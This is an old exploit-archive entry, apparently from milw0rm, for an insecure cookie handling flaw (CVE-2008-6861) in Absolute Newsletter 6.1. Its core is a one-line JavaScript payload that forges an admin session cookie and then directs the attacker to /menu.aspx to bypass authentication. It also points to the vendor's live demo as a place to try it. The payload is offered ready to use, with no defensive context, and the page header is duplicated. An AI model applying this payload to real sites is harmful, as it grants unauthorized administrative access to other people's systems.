Absolute NewsLetter 6.1 - Insecure Cookie Handling
| EKU-ID: 14777 | CVE: OSVDB-55883;CVE-2008-6861 | OSVDB-ID: |
| Author: x0r | Published: 2008-10-31 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 14777 | CVE: OSVDB-55883;CVE-2008-6861 | OSVDB-ID: |
| Author: x0r | Published: 2008-10-31 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
-=======================================- Autore: x0r Cms = Absolute Newsletter 6.1 Bug: Insecure Cookie Handling Vulnerability -=======================================- Exploit: javascript:document.cookie="xlaANLDEMOadmin=lvl=1&userid=1&usr=admin&s=TYPE A SERIES OF RANDOM NUMBERS AND CHARACTERS HERE; path=/"; and go to /menu.aspx Live Demo: http://www.xigla.com/absolutenl/demo [-] King Lion Gay [+] Margherita Ti Amo...I'm Sorry... _EOF_ # milw0rm.com [2008-10-31]